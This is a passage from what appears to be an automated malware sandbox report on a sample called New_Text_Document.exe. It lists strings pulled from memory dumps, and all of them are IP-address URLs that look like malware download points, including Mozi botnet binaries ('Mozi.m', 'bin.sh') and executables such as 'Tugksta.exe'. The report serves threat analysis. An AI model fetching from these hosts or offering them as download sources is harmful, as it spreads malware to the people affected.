                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.77.32:50062/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.157.189.10:61481/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.159.216.138:11565/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.160.127.131:25598/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.161.135.44:2041/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.161.6.237:58219/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.166.177.104:26136/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.166.237.38:24798/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.167.61.157:62908/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.103.124.198:30714/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.103.181.173:1117/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.107.87.225:24022/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.113.145.146:28120/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.114.167.221:3740/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.114.95.114:60330/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.117.7.182:12472/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.118.92.9:11933/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.119.104.212:37067/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.120.146.27:21190/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.121.254.3:54419/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.134.175.165:33893/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.138.150.55:58315/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.138.150.55:58315/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.138.73.164:35165/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.142.136.106:43709/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.243.14.67:34199/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.243.14.67:34199/mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.97.106.181:1301/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.255.187.90:28943/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.26.52.96:8000/j-16/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.8.18.50:13924/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.8.184.245:26899/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.8.185.18:33802/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.8.5.43:59603/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.8.50.163:31862/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.8.50.218:64466/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.113.111.237:46866/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.228.143.58:44467/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.93.108.161:63186/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.106.3/250/Tugksta.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.106.3/WSH/OI0ioioOI0I0I0oioioi0oiOI0oi0000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.112.19.248:64460/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.112.21.152:36450/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.123.10.93:41732/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.135.96.42:5579/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.146.231.89:50608/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.153.218.165:43757/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.164.134.156:57199/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.176.184.139:20483/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.176.206.12:48365/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.189.237.246:54977/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.190.247.54:57044/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.191.239.113:13435/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.192.191.109:63445/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.192.191.109:63445/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.232.87.245:49395/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.39.34.242:53543/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.4.145.98:62239/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.50.13.220:25602/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.96.221.50:30859/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://24.96.42.73:59703/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.113.195.69:19522/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.138.44.95:51803/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.193.31.92:44348/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.207.3.62:36013/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.216.34.125:36993/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.54.171.213:39258/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.123.129.109/TohttpPacketGameGenerator/ec6f9069daa80029e880d76fc3bf6a0698a7d554.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.0.136.2:50867/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.168.152.116:7282/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.168.179.83:5352/.i
